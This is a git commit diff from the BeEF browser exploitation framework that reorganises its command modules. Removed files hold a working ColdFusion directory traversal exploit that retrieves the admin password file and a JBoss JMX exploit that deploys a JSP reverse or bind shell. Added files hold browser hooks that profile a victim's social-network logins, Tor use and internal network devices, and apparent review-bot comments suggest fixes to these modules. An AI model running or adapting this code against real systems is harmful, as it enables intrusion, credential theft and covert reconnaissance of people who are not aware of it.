command modules re-organised and re-named

git-svn-id: https://beef.googlecode.com/svn/trunk@1292 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
wade@bindshell.net
2011-09-16 12:28:14 +00:00
parent 9127bbeb88
commit e97104f696
69 changed files with 41 additions and 41 deletions


@@ -1,47 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
* ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor .
* Inject into the vulnerable "locale" parameter the classic payload of a directory traversal.
* By default the exploit will retrieve the password.properties file, where the CF admin passwd is stored:
* the user is free to specify any other path that will be appended to the server root (ie C:\ on Windows)
*
* On a default win installation, the following vector works great:
* http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
* demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
*/
beef.execute(function() {
fileToRetrieve = "<%= @fileToRetrieve %>";
targetOS = "<%= @os_combobox %>";
cf_version = "<%= @cf_version %>";
var uri = null;
if(targetOS == "Windows"){
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\\ColdFusion' + cf_version + '\\lib\\' + fileToRetrieve + '%00en';
}else{
uri = '/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../../opt/coldfusion' + cf_version + '/lib/' + fileToRetrieve + '%00en';
}
beef.net.request("http", "GET", document.domain, document.location.port, uri,null, null, 10, 'text', function(response){
if(response.status_code == "success"){
titleStart = response.response_body.indexOf("<title>");
titleEnd = response.response_body.indexOf("</title>");
exploitResults = response.response_body.substring(titleStart + 7,titleEnd);
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: directory traversal failed.");
}
});
});


@@ -1,36 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'},
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
},
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
}
]
end
def post_execute
save({'result' => @datastore['result']})
end
end


@@ -1,48 +0,0 @@
import java.applet.*;
import java.net.*;
import java.util.*;
public class Beeffeine extends Applet {
public String MyIP()
{
String string = "unknown";
String string4 = getDocumentBase().getHost();
byte j = 80;
String string2;
String string3 = "internal_ip=";
int k = 80;
if (getDocumentBase().getPort() != -1)
k = getDocumentBase().getPort();
try {
string2 = new Socket(string4 , k).getLocalAddress().getHostAddress();
if (!string2.equals("255.255.255.255"))
string3 += string2;
}
catch (SecurityException securityexception) {
string3 += "FORBIDDEN";
}
catch (Exception exception) {
string3 += "exception";
}
string3 += "&internal_hostname=";
try {
string3 += new Socket(string4 , k).getLocalAddress().getHostName();
}
catch (Exception exception) {
string3 += "Cannot Lookup this IP";
}
return (string3);
}
public Beeffeine() {
super();
return;
}
}


@@ -1,52 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
if (beef.browser.isFF()) {
var internal_ip = beef.net.local.getLocalAddress();
var internal_hostname = beef.net.local.getLocalHostname();
if(internal_ip && internal_hostname) {
beef.net.send('<%= @command_url %>', <%= @command_id %>,
'internal_ip='+internal_ip+'&internal_hostname='+internal_hostname);
}
} else {
//Trying to insert the Beeffeine applet
content = "<APPLET code='Beeffeine' codebase='http://"+beef.net.host+":"+beef.net.port+"/Beeffeine.class' width=0 height=0 id=beeffeine name=beeffeine></APPLET>";
$j('body').append(content);
internal_counter = 0;
//We have to kick off a loop now, because the user has to accept the running of the applet perhaps
function waituntilok() {
try {
output = document.beeffeine.MyIP();
beef.net.send('<%= @command_url %>', <%= @command_id %>, output);
$j('#beeffeine').detach();
return;
} catch (e) {
internal_counter++;
if (internal_counter > 20) { //Timeout after 20 seconds
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=time out');
$j('#beeffeine').detach(); //kill the applet
return;
}
setTimeout(function() {waituntilok()},1000);
}
}
//Lets not kick this off just yet
setTimeout(function() {waituntilok()},5000);
}
});


@@ -1,37 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_local_settings < BeEF::Core::Command
def pre_send
#Mount the Beeffeine.class on /Beeffeine.class
#Unsure if there's something we can add here to check if the module was already mounted?
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/detect_local_settings/Beeffeine.class','/Beeffeine','class')
end
def post_execute
content = {}
content['internal ip'] = @datastore['internal_ip'] if not @datastore['internal_ip'].nil?
content['internal hostname'] = @datastore['internal_hostname'] if not @datastore['internal_hostname'].nil?
content['fail'] = 'could not grab local network settings' if content.empty?
#Unmount the class now, it's no longer required.
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/Beeffeine.class');
save content
end
end


@@ -0,0 +1,83 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var facebookresult = "";
var twitterresult = "";
if (document.getElementById('gmailimg')) {
return "Img has already been created";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.src = 'https://mail.google.com/mail/photos/static/AD34hIiQyJTs5FhsJ1mhFdK9wx4OZU2AgLNZLBbk2zMHYPUfs-ZzXPLq2s2vdBmgnJ6SoUCeBbFnjRlPUDXw860gsEDSKPrhBJYDgDBCd7g36x2tuBQc0TM?'+ new Date();
img.id = 'gmailimg';
img.setAttribute("attr","start");
img.onerror = function() {
this.setAttribute("attr","error");
};
img.onload = function() {
this.setAttribute("attr","load");
};
document.body.appendChild(img);
$j.ajax({
url: "https://twitter.com/account/use_phx?setting=false&amp;format=text",
dataType: "script",
cache: "false",
complete: function(one, two) {
if (two == "success") {
twitterresult = "User is NOT authenticated to Twitter (response:"+two+")";
} else if (two == "timeout") {
twitterresult = "User is authenticated to Twitter (response:"+two+")";
}
},
timeout: <%= @timeout %>
});
$j.ajax({
url: "https://www.facebook.com/imike3",
dataType: "script",
cache: "false",
error: function(one, two, three) {
facebookresult = "User is NOT authenticated to Facebook";
},
success: function(one, two, three) {
facebookresult = "User is authenticated to Facebook";
},
timeout: <%= @timeout %>
});
setTimeout(function() {
var img2 = document.getElementById('gmailimg');
if (img2.getAttribute("attr") == "error") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'gmail=User is NOT authenticated to GMail&twitter='+twitterresult+'&facebook='+facebookresult);
} else if (img2.getAttribute("attr") == "load") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'gmail=User is authenticated to GMail&twitter='+twitterresult+'&facebook='+facebookresult);
} else if (img2.getAttribute("attr") == "start") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'gmail=Browser timed out. Cannot determine if user is authenticated to GMail&twitter='+twitterresult+'&facebook='+facebookresult);
};
document.body.removeChild(img2);
img = null;
img2 = null;
}, <%= @timeout %>+3000);
});
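Review bot: `cache: "false"` on both `$j.ajax` calls (the twitter and facebook blocks) passes a non-empty string, which jQuery treats as truthy, so response caching is not actually disabled; the boolean `cache: false` is what is intended. In the twitter URL, `&amp;format=text` is an HTML entity inside a JavaScript string literal and is sent to the server literally, where `&format=text` is presumably meant. The twitter `complete` handler only assigns `twitterresult` for `"success"` and `"timeout"`, so any other jqXHR status (`"error"`, `"parsererror"`, `"abort"`) leaves it as the empty string and the final report in the setTimeout callback carries `&twitter=` with nothing; an `else { twitterresult = "Twitter check inconclusive (response:"+two+")"; }` branch would make that case visible. The early `return "Img has already been created"` is returned to beef.execute rather than sent with beef.net.send, so it is unclear from here whether the operator is ever told the script was run twice.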


@@ -15,11 +15,11 @@
#
beef:
module:
coldfusion_dir_traversal_exploit:
detect_soc_nets:
enable: true
category: "Network"
name: "ColdFusion Directory Traversal Exploit"
description: "ColdFusion 9.0, 8.0.1, 9.0 and 9.0.1 are vulnerable to directory traversal that leads to arbitrary file retrieval from the ColdFusion server (CVE-2010-2861)"
authors: ["antisnatchor"]
name: "Detect Social Networks"
description: "This module will detect if the Hooked Browser is currently authenticated to GMail, Facebook and Twitter."
authors: ["xntrik", "Mike Cardwell"]
target:
working: ["ALL"]


@@ -0,0 +1,32 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_soc_nets < BeEF::Core::Command
def self.options
return [
{'name' => 'timeout', 'ui_label' => 'Detection Timeout','value' => '5000'}
]
end
def post_execute
content = {}
content['GMail'] = @datastore['gmail']
content['Facebook'] = @datastore['facebook']
content['Twitter']= @datastore['twitter']
save content
end
end
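Review bot: `post_execute` saves the three `@datastore` values without checking that any of them is present, unlike `Detect_tor#post_execute` in this commit, which returns early on a nil result; since the hook script sends `gmail`, `twitter` and `facebook` in a single request, `return if @datastore['gmail'].nil?` at the top of the method would avoid persisting an all-nil record when the browser never reported back. The `timeout` option is declared as the string `'5000'` and is interpolated verbatim into the template as `timeout: <%= @timeout %>` and `setTimeout(..., <%= @timeout %>+3000)`, so a non-numeric value entered in the UI produces a JavaScript syntax error in the hook instead of a usable error; if the framework offers a hook before the template is rendered (the removed Detect_local_settings used `pre_send`), coercing with `Integer(...)` there would fail loudly on the server side instead. The same unvalidated interpolation applies to `Detect_tor`'s `timeout`, `Internal_network_fingerprinting`'s `ipRange`/`ports` and the ping_sweep module's `ipRange`/`timeout`/`delay`; raising it once here. The explicit `return [` in `self.options` can be an implicit return.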


@@ -0,0 +1,50 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
if (document.getElementById('torimg')) {
return "Img already created";
}
var img = new Image();
img.setAttribute("style","visibility:hidden");
img.setAttribute("width","0");
img.setAttribute("height","0");
img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
img.id = 'torimg';
img.setAttribute("attr","start");
img.onerror = function() {
this.setAttribute("attr","error");
};
img.onload = function() {
this.setAttribute("attr","load");
};
document.body.appendChild(img);
setTimeout(function() {
var img = document.getElementById('torimg');
if (img.getAttribute("attr") == "error") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not behind Tor');
} else if (img.getAttribute("attr") == "load") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is behind Tor');
} else if (img.getAttribute("attr") == "start") {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser timed out. Cannot determine if browser is behind Tor');
};
document.body.removeChild(img);
}, <%= @timeout %>);
});
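Review bot: The `"error"` branch of the setTimeout callback reports `result=Browser is not behind Tor`, but `onerror` fires for any load failure — the fixed `.onion` host being down, the `wink.gif` path changing, or an image blocker — so a non-Tor verdict is only as reliable as that third-party host; a wording like `'result=Browser does not appear to be behind Tor (onion image failed to load)'` plus a comment above `img.src` noting the dependency on that host would make the caveat visible to the operator. Inside the callback, `var img = document.getElementById('torimg')` shadows the outer `img` that is still in closure scope; either drop the lookup and reuse the outer `img`, or name it `img2` as the sibling detect_soc_nets script does. The `};` closing the `if`/`else if` chain carries a stray semicolon, and the early `return "Img already created"` is not sent via beef.net.send, so it is unclear from here whether the operator learns that the module ran twice.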


@@ -15,13 +15,11 @@
#
beef:
module:
detect_local_settings:
detect_tor:
enable: true
category: "Network"
name: "Detect Local Settings"
description: "Grab the local network settings (ie internal ip address)."
authors: ["pdp", "wade", "bm", "xntrik"]
name: "Detect Tor"
description: "This module will detect if the zombie is currently using Tor (https://www.torproject.org/)."
authors: ["wade", "pdp", "bm", "xntrik"]
target:
working: ["FF", "IE"]
user_notify: "C"
not_working: "S"
working: ["ALL"]


@@ -0,0 +1,30 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Detect_tor < BeEF::Core::Command
def self.options
return [
{'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'}
]
end
def post_execute
return if @datastore['result'].nil?
save({'result' => @datastore['result']})
end
end
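Review bot: The option hash in `self.options` mixes spacing styles (`'name'=>'timeout', 'ui_label' =>'Detection timeout','value'=>'10000'`) and differs from the `'key' => 'value'` form used by the other command classes in this commit; `{'name' => 'timeout', 'ui_label' => 'Detection timeout', 'value' => '10000'}` would match them. The explicit `return [` can be an implicit return, as the array literal is the method's last expression.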


@@ -0,0 +1,108 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var dom = document.createElement('b');
var ips = new Array();
ipRange = "<%= @ipRange %>";
ports = "<%= @ports %>";
if(ports != null){
ports = ports.split(',');
}
if(ipRange != null){
// ipRange will be in the form of 192.168.0.1-192.168.0.254: the fourth octet will be iterated.
// (only C class IPs are supported atm)
ipBounds = ipRange.split('-');
lowerBound = ipBounds[0].split('.')[3];
upperBound = ipBounds[1].split('.')[3];
for(i=lowerBound;i<=upperBound;i++){
ipToTest = "http://"+ipBounds[0].split('.')[0]+"."+ipBounds[0].split('.')[1]+"."+ipBounds[0].split('.')[2]+"."+i;
ips.push(ipToTest);
}
}else{
//use default IPs
ips = [
'http://192.168.0.1',
'http://192.168.0.100',
'http://192.168.0.254',
'http://192.168.1.1',
'http://192.168.1.100',
'http://192.168.1.254',
'http://10.0.0.1',
'http://10.1.1.1',
'http://192.168.2.1',
'http://192.168.2.254',
'http://192.168.100.1',
'http://192.168.100.254',
'http://192.168.123.1',
'http://192.168.123.254',
'http://192.168.10.1',
'http://192.168.10.254'
];
}
var urls = new Array(
// in the form of: "Dev/App Name","Default Port","Use Multiple Ports if specified","IMG url","IMG width","IMG height"
new Array("Apache",":80",false,"/icons/apache_pb.gif",259,32),
new Array("Apache 2.x",":80",false,"/icons/apache_pb2.gif",259,32),
new Array("Microsoft IIS 7.x",":80",false,"/welcome.png",571,411),
new Array("Microsoft IIS",":80",false,"/pagerror.gif",36,48),
new Array("QNAP NAS",":8080",false,"/ajax_obj/img/running.gif",16,16),
new Array("QNAP NAS",":8080",false,"/ajax_obj/images/qnap_logo_w.gif",115,21),
new Array("Belkin Router",":80",false,"/images/title_2.gif",321,28),
new Array("SMC Networks",":80",false,"/images/logo.gif",133,59),
new Array("Linksys NAS",":80",false,"/Admin_top.JPG",750,52),
new Array("Linksys NAS",":80",false,"/logo.jpg",194,52),
new Array("Linksys Network Camera",":80",false,"/welcome.jpg",146,250),
new Array("Linksys Wireless-G Camera",":80",false,"/header.gif",750,97),
new Array("Cisco IP Phone",":80",false,"/Images/Logo",120,66),
new Array("Snom Phone",":80",false,"/img/snom_logo.png",168,62),
new Array("Brother Printer",":80",false,"/pbio/brother.gif",144,52),
new Array("HP LaserJet",":80",false,"/hp/device/images/logo.gif",42,27),
new Array("JBoss Application server",":8080",true,"/images/logo.gif",226,105),
new Array("Siemens Simatic",":80",false,"/Images/Siemens_Firmenmarke.gif",115,76),
new Array("APC InfraStruXure Manager",":80",false,"/images/Xlogo_Layer-1.gif",342,327),
new Array("Barracuda Spam/Virus Firewall",":8000",true,"/images/powered_by.gif",211,26),
new Array("Wordpress",":80",false,"/wp-includes/images/wpmini-blue.png",16,16)
);
// for each ip
for(var i=0; i < ips.length; i++) {
// for each url
for(var u=0; u < urls.length; u++) {
if(!urls[u][2] && ports != null){ // use default port
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
img.id = u;
img.src = ips[i]+urls[u][1]+urls[u][3];
img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}else{ // iterate to all the specified ports
for(p=0;p<ports.length;p++){
var img = new Image;
//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "], port [" + ports[p] + "]");
img.id = u;
img.src = ips[i]+":"+ports[p]+urls[u][3];
img.onload = function() { if (this.width == urls[this.id][4] && this.height == urls[this.id][5]) { beef.net.send('<%= @command_url %>', <%= @command_id %>,'device='+escape(urls[this.id][0])+"&url="+escape(this.src));dom.removeChild(this); } }
dom.appendChild(img);
}
}
}
}
});
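Review bot: The octet loop `for(i=lowerBound;i<=upperBound;i++)` compares two strings on its first iteration, because both bounds come from `split('.')[3]` without conversion; under string comparison `"3" <= "254"` is false, so a range such as 192.168.0.3-192.168.0.254 (constructed example) scans nothing at all. Converting once, `lowerBound = parseInt(ipBounds[0].split('.')[3], 10); upperBound = parseInt(ipBounds[1].split('.')[3], 10);`, fixes it; the ping_sweep script in this commit has the same loop and the same issue. `ipRange` and `ports` are template-interpolated strings and can never be `null`, so `if(ipRange != null)` and `if(ports != null)` are always true and the default IP list under `//use default IPs` is unreachable; with an empty `ipRange` the code instead reaches `ipBounds[1].split` and throws, so comparing against `""` (or checking `ipBounds.length > 1` as ping_sweep does) would restore the fallback. A comment above the `var urls` table noting that `this.width`/`this.height` are compared against the signature's expected dimensions, not the requested `width`/`height`, would help the next maintainer read the `onload` handlers.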


@@ -15,11 +15,12 @@
#
beef:
module:
vtiger_crm_upload_exploit:
internal_network_fingerprinting:
enable: true
category: "Network"
name: "VTiger CRM Upload Exploit"
description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href=\"http://www.vtiger.com/\">vtiger 5.0.4</a><br />The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888."
authors: ["wade", "bm", "pipes", "xntrik", "yorikv"]
name: "Fingerprint Network"
description: "Discover devices and applications in the network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)."
authors: ["bcoles@gmail.com", "wade", "antisnatchor"]
target:
working: ["ALL"]
user_notify: ["FF", "IE"]
not_working: ["O"]


@@ -0,0 +1,55 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Internal Network Fingerprinting
# Discover devices and applications in the internal network of the victim using
# signatures like default logo images/favicons (partially based on the Yokoso idea).
# It does this by loading images on common/predefined local network
# IP addresses then matching the image width, height and path to those
# for a known device.
#
# TODO LIST
# Add IPv6 support
# Add HTTPS support
# - Devices with invalid certs are blocked by IE and FF by default
# Improve stealth
# - Load images with CSS "background:" CSS to avoid http auth login popups
# Improve speed
# - Make IP addresses a user-configurable option rather than a hard-coded list
# - Detect local ip range first - using browser history and/or with java
# - History theft via CSS history is patched in modern browsers.
# - Local IP theft with Java is slow and may fail
class Internal_network_fingerprinting < BeEF::Core::Command
def self.options
return [
{'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'},
{'name' => 'ports', 'ui_label' => 'Ports to test', 'value' => '80,8080'}
]
end
def post_execute
content = {}
content['device'] =@datastore['device'] if not @datastore['device'].nil?
content['url'] = @datastore['url'] if not @datastore['url'].nil?
if content.empty?
content['fail'] = 'No devices/applications have been discovered.'
end
save content
end
end
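Review bot: The TODO list in the header still says `Make IP addresses a user-configurable option rather than a hard-coded list`, but `self.options` directly below exposes `ipRange` and `ports`, so that item is stale and should be removed or reworded. `content['device'] =@datastore['device'] if not @datastore['device'].nil?` would read more idiomatically as `content['device'] = @datastore['device'] unless @datastore['device'].nil?` (and likewise for `url`), and `return [` can be an implicit return. The `ipRange` label says `C class` but gives no shape; since the hook only iterates the fourth octet of a `start-end` pair, a format hint such as `a.b.c.x-a.b.c.y` in the `ui_label` would tell the operator what is accepted.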


@@ -1,67 +0,0 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
* Jboss 6.0.0M1 JMX Upload Exploit
* Ported from l33tb0y Ruby code in Javascript by antisnatchor.
* HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler OR shell binding to high port
*
* This is a variation of the JBOSS exploits of Metasploit: instead of deploying a WAR, directly deploy a JSP reverse shell.
* This is the stealthiest approach: nothing is shown on the logs
*/
beef.execute(function() {
rhost = "<%= @rhost %>";
rport = "<%= @rport %>";
lhost = "<%= @lhost %>";
lport = "<%= @lport %>";
injectedCommand = "<%= @injectedCommand %>";
jspName = "<%= @jspName %>";
payloadType = "<%= @payload %>";
reverse = "try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
bind = "try%20%7B%20ServerSocket%20server_socket%20=%20new%20ServerSocket(%20" + lport + "%20);%20Socket%20socket%20=%20server_socket.accept();%20server_socket.close();%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + injectedCommand + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20";
if(payloadType == "reverse"){
payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + reverse + "%25%3E";
}else{
payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20" + bind + "%25%3E";
}
uri = "/jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + jspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
/* always use dataType: script when doing cross-domain XHR, otherwise even if the HTTP resp is 200, jQuery.ajax will always launch the error() event*/
beef.net.request("http", "HEAD", rhost, rport, uri,null, null, 10, 'script', function(response){
if(response.status_code == "success"){
function triggerReverseConn(){
beef.net.request("http", "GET", rhost, rport,"/web-console/" + jspName + ".jsp", null, null, 10, 'script', function(response){
if(response.status_code == "success"){
if(payloadType == "reverse"){
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Reverse JSP shell should have been triggered. Check your MSF handler listener.");
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Bind JSP shell should have been triggered. Try to connect to "+rhost+":"+lport+".");
}
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: second GET request failed.");
}
});
}
// give the time to JBoss to deploy the JSP reverse shell
setTimeout(triggerReverseConn,10000);
}else{
beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=ERROR: first HEAD request failed.");
}
});
});


@@ -1,37 +0,0 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
